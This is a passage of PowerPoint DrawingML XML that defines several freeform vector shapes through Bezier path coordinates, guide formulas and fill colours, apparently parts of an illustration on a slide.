                    <a:pt x="84" y="461"/>
                    <a:pt x="80" y="467"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="471"/>
                    <a:pt x="71" y="476"/>
                    <a:pt x="71" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="493"/>
                    <a:pt x="85" y="492"/>
                    <a:pt x="100" y="492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="492"/>
                    <a:pt x="122" y="493"/>
                    <a:pt x="122" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="475"/>
                    <a:pt x="116" y="471"/>
                    <a:pt x="116" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="456"/>
                    <a:pt x="121" y="435"/>
                    <a:pt x="123" y="412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="390"/>
                    <a:pt x="123" y="357"/>
                    <a:pt x="127" y="364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="371"/>
                    <a:pt x="130" y="383"/>
                    <a:pt x="138" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="434"/>
                    <a:pt x="147" y="445"/>
                    <a:pt x="144" y="456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="466"/>
                    <a:pt x="137" y="465"/>
                    <a:pt x="137" y="476"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="492"/>
                    <a:pt x="154" y="492"/>
                    <a:pt x="168" y="492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="492"/>
                    <a:pt x="188" y="492"/>
                    <a:pt x="205" y="492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="492"/>
                    <a:pt x="231" y="493"/>
                    <a:pt x="231" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="473"/>
                    <a:pt x="222" y="460"/>
                    <a:pt x="205" y="461"/>
                  </a:cubicBez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5" tIns="22857" rIns="45715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7" name="Freeform 793">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BD81AE-F317-9B45-90D2-13AF4E6FF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07974" y="7494830"/>
              <a:ext cx="256582" cy="149673"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 24"/>
                <a:gd name="T1" fmla="*/ 4 h 14"/>
                <a:gd name="T2" fmla="*/ 16 w 24"/>
                <a:gd name="T3" fmla="*/ 2 h 14"/>
                <a:gd name="T4" fmla="*/ 18 w 24"/>
                <a:gd name="T5" fmla="*/ 10 h 14"/>
                <a:gd name="T6" fmla="*/ 8 w 24"/>
                <a:gd name="T7" fmla="*/ 12 h 14"/>
                <a:gd name="T8" fmla="*/ 6 w 24"/>
                <a:gd name="T9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4">
                  <a:moveTo>
                    <a:pt x="6" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="2"/>
                    <a:pt x="16" y="2"/>
                    <a:pt x="16" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="24" y="8"/>
                    <a:pt x="18" y="10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2" y="14"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="6" y="4"/>
                  </a:cubicBez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5" tIns="22857" rIns="45715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" name="Freeform 794">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C39E4909-6DCA-D848-9BD3-797AAED73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9356" y="7601739"/>
              <a:ext cx="256582" cy="138982"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 24"/>
                <a:gd name="T1" fmla="*/ 4 h 13"/>
                <a:gd name="T2" fmla="*/ 16 w 24"/>
                <a:gd name="T3" fmla="*/ 1 h 13"/>
                <a:gd name="T4" fmla="*/ 18 w 24"/>
                <a:gd name="T5" fmla="*/ 9 h 13"/>
                <a:gd name="T6" fmla="*/ 8 w 24"/>
                <a:gd name="T7" fmla="*/ 12 h 13"/>
                <a:gd name="T8" fmla="*/ 6 w 24"/>
                <a:gd name="T9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3">
                  <a:moveTo>
                    <a:pt x="6" y="4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22" y="0"/>
                    <a:pt x="24" y="7"/>
                    <a:pt x="18" y="9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2" y="13"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="6" y="4"/>
                  </a:cubicBez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5" tIns="22857" rIns="45715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9" name="Freeform 795">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38FA9F8-D37D-A041-9831-A6AC8D712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97283" y="7398612"/>
              <a:ext cx="224509" cy="138982"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 21"/>
                <a:gd name="T1" fmla="*/ 10 h 13"/>
                <a:gd name="T2" fmla="*/ 8 w 21"/>
                <a:gd name="T3" fmla="*/ 12 h 13"/>
                <a:gd name="T4" fmla="*/ 6 w 21"/>
                <a:gd name="T5" fmla="*/ 4 h 13"/>
                <a:gd name="T6" fmla="*/ 13 w 21"/>
                <a:gd name="T7" fmla="*/ 2 h 13"/>
                <a:gd name="T8" fmla="*/ 15 w 21"/>
                <a:gd name="T9" fmla="*/ 1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3">
                  <a:moveTo>
                    <a:pt x="15" y="10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2" y="13"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="6" y="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9" y="0"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="15" y="10"/>
                  </a:cubicBez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5" tIns="22857" rIns="45715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0" name="Freeform 799">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20350DF3-23D6-694F-B509-825F5CBF50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77210" y="5452864"/>
              <a:ext cx="1165310" cy="1154619"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 104 w 109"/>
                <a:gd name="T1" fmla="*/ 39 h 108"/>
                <a:gd name="T2" fmla="*/ 55 w 109"/>
                <a:gd name="T3" fmla="*/ 3 h 108"/>
                <a:gd name="T4" fmla="*/ 6 w 109"/>
                <a:gd name="T5" fmla="*/ 39 h 108"/>
                <a:gd name="T6" fmla="*/ 20 w 109"/>
                <a:gd name="T7" fmla="*/ 96 h 108"/>
                <a:gd name="T8" fmla="*/ 31 w 109"/>
                <a:gd name="T9" fmla="*/ 49 h 108"/>
                <a:gd name="T10" fmla="*/ 55 w 109"/>
                <a:gd name="T11" fmla="*/ 32 h 108"/>
                <a:gd name="T12" fmla="*/ 78 w 109"/>
                <a:gd name="T13" fmla="*/ 49 h 108"/>
                <a:gd name="T14" fmla="*/ 89 w 109"/>
                <a:gd name="T15" fmla="*/ 96 h 108"/>
                <a:gd name="T16" fmla="*/ 104 w 109"/>
                <a:gd name="T17" fmla="*/ 3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108">
                  <a:moveTo>
                    <a:pt x="104" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="16"/>
                    <a:pt x="70" y="0"/>
                    <a:pt x="55" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="10" y="16"/>
                    <a:pt x="6" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="68"/>
                    <a:pt x="7" y="78"/>
                    <a:pt x="20" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="108"/>
                    <a:pt x="16" y="75"/>
                    <a:pt x="31" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="38"/>
                    <a:pt x="47" y="36"/>
                    <a:pt x="55" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="36"/>
                    <a:pt x="71" y="38"/>
                    <a:pt x="78" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="75"/>
                    <a:pt x="80" y="108"/>
                    <a:pt x="89" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="78"/>
                    <a:pt x="109" y="68"/>
                    <a:pt x="104" y="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45715" tIns="22857" rIns="45715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1" name="Freeform 847">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4227C3-D90A-CC4A-99D9-6A2103E93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00442" y="7270324"/>
              <a:ext cx="1812113" cy="2544439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 165 w 169"/>
                <a:gd name="T1" fmla="*/ 50 h 238"/>
                <a:gd name="T2" fmla="*/ 163 w 169"/>
                <a:gd name="T3" fmla="*/ 17 h 238"/>
                <a:gd name="T4" fmla="*/ 104 w 169"/>
                <a:gd name="T5" fmla="*/ 0 h 238"/>
                <a:gd name="T6" fmla="*/ 99 w 169"/>
                <a:gd name="T7" fmla="*/ 2 h 238"/>
                <a:gd name="T8" fmla="*/ 52 w 169"/>
                <a:gd name="T9" fmla="*/ 18 h 238"/>
                <a:gd name="T10" fmla="*/ 44 w 169"/>
                <a:gd name="T11" fmla="*/ 69 h 238"/>
                <a:gd name="T12" fmla="*/ 41 w 169"/>
                <a:gd name="T13" fmla="*/ 140 h 238"/>
                <a:gd name="T14" fmla="*/ 51 w 169"/>
                <a:gd name="T15" fmla="*/ 191 h 238"/>
                <a:gd name="T16" fmla="*/ 26 w 169"/>
                <a:gd name="T17" fmla="*/ 206 h 238"/>
                <a:gd name="T18" fmla="*/ 0 w 169"/>
                <a:gd name="T19" fmla="*/ 230 h 238"/>
                <a:gd name="T20" fmla="*/ 26 w 169"/>
                <a:gd name="T21" fmla="*/ 236 h 238"/>
                <a:gd name="T22" fmla="*/ 63 w 169"/>
                <a:gd name="T23" fmla="*/ 236 h 238"/>
                <a:gd name="T24" fmla="*/ 94 w 169"/>
                <a:gd name="T25" fmla="*/ 221 h 238"/>
                <a:gd name="T26" fmla="*/ 88 w 169"/>
                <a:gd name="T27" fmla="*/ 201 h 238"/>
                <a:gd name="T28" fmla="*/ 94 w 169"/>
                <a:gd name="T29" fmla="*/ 148 h 238"/>
                <a:gd name="T30" fmla="*/ 105 w 169"/>
                <a:gd name="T31" fmla="*/ 109 h 238"/>
                <a:gd name="T32" fmla="*/ 109 w 169"/>
                <a:gd name="T33" fmla="*/ 157 h 238"/>
                <a:gd name="T34" fmla="*/ 116 w 169"/>
                <a:gd name="T35" fmla="*/ 204 h 238"/>
                <a:gd name="T36" fmla="*/ 109 w 169"/>
                <a:gd name="T37" fmla="*/ 230 h 238"/>
                <a:gd name="T38" fmla="*/ 132 w 169"/>
                <a:gd name="T39" fmla="*/ 236 h 238"/>
                <a:gd name="T40" fmla="*/ 160 w 169"/>
                <a:gd name="T41" fmla="*/ 230 h 238"/>
                <a:gd name="T42" fmla="*/ 151 w 169"/>
                <a:gd name="T43" fmla="*/ 212 h 238"/>
                <a:gd name="T44" fmla="*/ 158 w 169"/>
                <a:gd name="T45" fmla="*/ 154 h 238"/>
                <a:gd name="T46" fmla="*/ 165 w 169"/>
                <a:gd name="T47" fmla="*/ 5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9" h="238">
                  <a:moveTo>
                    <a:pt x="165" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="35"/>
                    <a:pt x="164" y="24"/>
                    <a:pt x="163" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="15"/>
                    <a:pt x="123" y="8"/>
                    <a:pt x="104" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="1"/>
                    <a:pt x="101" y="2"/>
                    <a:pt x="99" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="9"/>
                    <a:pt x="65" y="15"/>
                    <a:pt x="52" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="43"/>
                    <a:pt x="49" y="52"/>
                    <a:pt x="44" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="95"/>
                    <a:pt x="38" y="111"/>
                    <a:pt x="41" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="157"/>
                    <a:pt x="48" y="170"/>
                    <a:pt x="51" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="209"/>
                    <a:pt x="44" y="207"/>
                    <a:pt x="26" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="205"/>
                    <a:pt x="0" y="218"/>
                    <a:pt x="0" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="238"/>
                    <a:pt x="9" y="236"/>
                    <a:pt x="26" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="236"/>
                    <a:pt x="50" y="236"/>
                    <a:pt x="63" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="236"/>
                    <a:pt x="94" y="237"/>
                    <a:pt x="94" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="210"/>
                    <a:pt x="90" y="211"/>
                    <a:pt x="88" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="189"/>
                    <a:pt x="81" y="179"/>
                    <a:pt x="94" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="128"/>
                    <a:pt x="101" y="116"/>
                    <a:pt x="105" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="101"/>
                    <a:pt x="106" y="135"/>
                    <a:pt x="109" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="180"/>
                    <a:pt x="116" y="200"/>
                    <a:pt x="116" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="215"/>
                    <a:pt x="109" y="220"/>
                    <a:pt x="109" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="238"/>
                    <a:pt x="117" y="236"/>
                    <a:pt x="132" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="236"/>
                    <a:pt x="160" y="238"/>
                    <a:pt x="160" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="221"/>
                    <a:pt x="154" y="216"/>
                    <a:pt x="151" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="206"/>
                    <a:pt x="149" y="187"/>
                    <a:pt x="158" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="130"/>
                    <a:pt x="169" y="102"/>
                    <a:pt x="165" y="50"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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2" name="Freeform 848">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD880C02-1B8F-A541-8CBB-CCE8A3DE4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4951" y="6618178"/>
              <a:ext cx="1405858" cy="865964"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 131"/>
                <a:gd name="T1" fmla="*/ 26 h 81"/>
                <a:gd name="T2" fmla="*/ 130 w 131"/>
                <a:gd name="T3" fmla="*/ 9 h 81"/>
                <a:gd name="T4" fmla="*/ 117 w 131"/>
                <a:gd name="T5" fmla="*/ 14 h 81"/>
                <a:gd name="T6" fmla="*/ 128 w 131"/>
                <a:gd name="T7" fmla="*/ 9 h 81"/>
                <a:gd name="T8" fmla="*/ 125 w 131"/>
                <a:gd name="T9" fmla="*/ 2 h 81"/>
                <a:gd name="T10" fmla="*/ 105 w 131"/>
                <a:gd name="T11" fmla="*/ 12 h 81"/>
                <a:gd name="T12" fmla="*/ 93 w 131"/>
                <a:gd name="T13" fmla="*/ 25 h 81"/>
                <a:gd name="T14" fmla="*/ 26 w 131"/>
                <a:gd name="T15" fmla="*/ 33 h 81"/>
                <a:gd name="T16" fmla="*/ 2 w 131"/>
                <a:gd name="T17" fmla="*/ 45 h 81"/>
                <a:gd name="T18" fmla="*/ 11 w 131"/>
                <a:gd name="T19" fmla="*/ 71 h 81"/>
                <a:gd name="T20" fmla="*/ 103 w 131"/>
                <a:gd name="T21" fmla="*/ 47 h 81"/>
                <a:gd name="T22" fmla="*/ 129 w 131"/>
                <a:gd name="T23" fmla="*/ 31 h 81"/>
                <a:gd name="T24" fmla="*/ 129 w 131"/>
                <a:gd name="T25" fmla="*/ 30 h 81"/>
                <a:gd name="T26" fmla="*/ 130 w 131"/>
                <a:gd name="T27" fmla="*/ 30 h 81"/>
                <a:gd name="T28" fmla="*/ 129 w 131"/>
                <a:gd name="T29" fmla="*/ 2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81">
                  <a:moveTo>
                    <a:pt x="129" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="22"/>
                    <a:pt x="129" y="15"/>
                    <a:pt x="130" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="13"/>
                    <a:pt x="115" y="16"/>
                    <a:pt x="117" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="11"/>
                    <a:pt x="125" y="11"/>
                    <a:pt x="128" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="6"/>
                    <a:pt x="131" y="0"/>
                    <a:pt x="125" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="4"/>
                    <a:pt x="109" y="7"/>
                    <a:pt x="105" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="17"/>
                    <a:pt x="98" y="23"/>
                    <a:pt x="93" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="28"/>
                    <a:pt x="38" y="39"/>
                    <a:pt x="26" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="28"/>
                    <a:pt x="5" y="35"/>
                    <a:pt x="2" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="54"/>
                    <a:pt x="3" y="65"/>
                    <a:pt x="11" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="81"/>
                    <a:pt x="62" y="62"/>
                    <a:pt x="103" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="45"/>
                    <a:pt x="131" y="34"/>
                    <a:pt x="129" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="30"/>
                    <a:pt x="129" y="30"/>
                    <a:pt x="129" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="30"/>
                    <a:pt x="129" y="30"/>
                    <a:pt x="130" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="29"/>
                    <a:pt x="129" y="27"/>
                    <a:pt x="129" y="26"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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3" name="Freeform 849">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA8F866-473F-0245-9E09-D49A6E1C6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96660" y="4854176"/>
              <a:ext cx="523855" cy="459710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 49"/>
                <a:gd name="T1" fmla="*/ 40 h 43"/>
                <a:gd name="T2" fmla="*/ 49 w 49"/>
                <a:gd name="T3" fmla="*/ 6 h 43"/>
                <a:gd name="T4" fmla="*/ 15 w 49"/>
                <a:gd name="T5" fmla="*/ 0 h 43"/>
                <a:gd name="T6" fmla="*/ 3 w 49"/>
                <a:gd name="T7" fmla="*/ 1 h 43"/>
                <a:gd name="T8" fmla="*/ 0 w 49"/>
                <a:gd name="T9" fmla="*/ 25 h 43"/>
                <a:gd name="T10" fmla="*/ 1 w 49"/>
                <a:gd name="T11" fmla="*/ 43 h 43"/>
                <a:gd name="T12" fmla="*/ 13 w 49"/>
                <a:gd name="T13" fmla="*/ 43 h 43"/>
                <a:gd name="T14" fmla="*/ 35 w 49"/>
                <a:gd name="T1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43">
                  <a:moveTo>
                    <a:pt x="35" y="40"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="34"/>
                    <a:pt x="49" y="12"/>
                    <a:pt x="49" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="4"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="3" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="8"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="37"/>
                    <a:pt x="1" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="43"/>
                    <a:pt x="8" y="43"/>
                    <a:pt x="13" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="43"/>
                    <a:pt x="34" y="41"/>
                    <a:pt x="35" y="40"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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4" name="Freeform 850">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF2F135-4341-BC4F-84E0-2F99506AEA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2187" y="4052357"/>
              <a:ext cx="2058004" cy="3378331"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 162 w 192"/>
                <a:gd name="T1" fmla="*/ 230 h 316"/>
                <a:gd name="T2" fmla="*/ 154 w 192"/>
                <a:gd name="T3" fmla="*/ 226 h 316"/>
                <a:gd name="T4" fmla="*/ 154 w 192"/>
                <a:gd name="T5" fmla="*/ 226 h 316"/>
                <a:gd name="T6" fmla="*/ 118 w 192"/>
                <a:gd name="T7" fmla="*/ 216 h 316"/>
                <a:gd name="T8" fmla="*/ 119 w 192"/>
                <a:gd name="T9" fmla="*/ 196 h 316"/>
                <a:gd name="T10" fmla="*/ 192 w 192"/>
                <a:gd name="T11" fmla="*/ 100 h 316"/>
                <a:gd name="T12" fmla="*/ 92 w 192"/>
                <a:gd name="T13" fmla="*/ 0 h 316"/>
                <a:gd name="T14" fmla="*/ 4 w 192"/>
                <a:gd name="T15" fmla="*/ 52 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 192"/>
                <a:gd name="T17" fmla="*/ 52 h 316"/>
                <a:gd name="T18" fmla="*/ 24 w 192"/>
                <a:gd name="T19" fmla="*/ 54 h 316"/>
                <a:gd name="T20" fmla="*/ 64 w 192"/>
                <a:gd name="T21" fmla="*/ 58 h 316"/>
                <a:gd name="T22" fmla="*/ 64 w 192"/>
                <a:gd name="T23" fmla="*/ 58 h 316"/>
                <a:gd name="T24" fmla="*/ 103 w 192"/>
                <a:gd name="T25" fmla="*/ 54 h 316"/>
                <a:gd name="T26" fmla="*/ 120 w 192"/>
                <a:gd name="T27" fmla="*/ 52 h 316"/>
                <a:gd name="T28" fmla="*/ 174 w 192"/>
                <a:gd name="T29" fmla="*/ 75 h 316"/>
                <a:gd name="T30" fmla="*/ 157 w 192"/>
                <a:gd name="T31" fmla="*/ 133 h 316"/>
                <a:gd name="T32" fmla="*/ 122 w 192"/>
                <a:gd name="T33" fmla="*/ 141 h 316"/>
                <a:gd name="T34" fmla="*/ 86 w 192"/>
                <a:gd name="T35" fmla="*/ 133 h 316"/>
                <a:gd name="T36" fmla="*/ 64 w 192"/>
                <a:gd name="T37" fmla="*/ 83 h 316"/>
                <a:gd name="T38" fmla="*/ 64 w 192"/>
                <a:gd name="T39" fmla="*/ 83 h 316"/>
                <a:gd name="T40" fmla="*/ 63 w 192"/>
                <a:gd name="T41" fmla="*/ 83 h 316"/>
                <a:gd name="T42" fmla="*/ 41 w 192"/>
                <a:gd name="T43" fmla="*/ 133 h 316"/>
                <a:gd name="T44" fmla="*/ 5 w 192"/>
                <a:gd name="T45" fmla="*/ 141 h 316"/>
                <a:gd name="T46" fmla="*/ 0 w 192"/>
                <a:gd name="T47" fmla="*/ 141 h 316"/>
                <a:gd name="T48" fmla="*/ 62 w 192"/>
                <a:gd name="T49" fmla="*/ 195 h 316"/>
                <a:gd name="T50" fmla="*/ 55 w 192"/>
                <a:gd name="T51" fmla="*/ 218 h 316"/>
                <a:gd name="T52" fmla="*/ 33 w 192"/>
                <a:gd name="T53" fmla="*/ 224 h 316"/>
                <a:gd name="T54" fmla="*/ 50 w 192"/>
                <a:gd name="T55" fmla="*/ 235 h 316"/>
                <a:gd name="T56" fmla="*/ 55 w 192"/>
                <a:gd name="T57" fmla="*/ 234 h 316"/>
                <a:gd name="T58" fmla="*/ 63 w 192"/>
                <a:gd name="T59" fmla="*/ 237 h 316"/>
                <a:gd name="T60" fmla="*/ 77 w 192"/>
                <a:gd name="T61" fmla="*/ 258 h 316"/>
                <a:gd name="T62" fmla="*/ 77 w 192"/>
                <a:gd name="T63" fmla="*/ 263 h 316"/>
                <a:gd name="T64" fmla="*/ 95 w 192"/>
                <a:gd name="T65" fmla="*/ 259 h 316"/>
                <a:gd name="T66" fmla="*/ 101 w 192"/>
                <a:gd name="T67" fmla="*/ 252 h 316"/>
                <a:gd name="T68" fmla="*/ 105 w 192"/>
                <a:gd name="T69" fmla="*/ 248 h 316"/>
                <a:gd name="T70" fmla="*/ 127 w 192"/>
                <a:gd name="T71" fmla="*/ 236 h 316"/>
                <a:gd name="T72" fmla="*/ 131 w 192"/>
                <a:gd name="T73" fmla="*/ 236 h 316"/>
                <a:gd name="T74" fmla="*/ 138 w 192"/>
                <a:gd name="T75" fmla="*/ 239 h 316"/>
                <a:gd name="T76" fmla="*/ 138 w 192"/>
                <a:gd name="T77" fmla="*/ 241 h 316"/>
                <a:gd name="T78" fmla="*/ 139 w 192"/>
                <a:gd name="T79" fmla="*/ 268 h 316"/>
                <a:gd name="T80" fmla="*/ 139 w 192"/>
                <a:gd name="T81" fmla="*/ 269 h 316"/>
                <a:gd name="T82" fmla="*/ 139 w 192"/>
                <a:gd name="T83" fmla="*/ 273 h 316"/>
                <a:gd name="T84" fmla="*/ 138 w 192"/>
                <a:gd name="T85" fmla="*/ 275 h 316"/>
                <a:gd name="T86" fmla="*/ 138 w 192"/>
                <a:gd name="T87" fmla="*/ 275 h 316"/>
                <a:gd name="T88" fmla="*/ 126 w 192"/>
                <a:gd name="T89" fmla="*/ 285 h 316"/>
                <a:gd name="T90" fmla="*/ 109 w 192"/>
                <a:gd name="T91" fmla="*/ 293 h 316"/>
                <a:gd name="T92" fmla="*/ 95 w 192"/>
                <a:gd name="T93" fmla="*/ 298 h 316"/>
                <a:gd name="T94" fmla="*/ 159 w 192"/>
                <a:gd name="T95" fmla="*/ 310 h 316"/>
                <a:gd name="T96" fmla="*/ 175 w 192"/>
                <a:gd name="T97" fmla="*/ 276 h 316"/>
                <a:gd name="T98" fmla="*/ 162 w 192"/>
                <a:gd name="T99" fmla="*/ 23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92" h="316">
                  <a:moveTo>
                    <a:pt x="162" y="230"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="227"/>
                    <a:pt x="157" y="226"/>
                    <a:pt x="154" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="226"/>
                    <a:pt x="154" y="226"/>
                    <a:pt x="154" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="222"/>
                    <a:pt x="135" y="221"/>
                    <a:pt x="118" y="216"/>
                  </a:cubicBezTo>
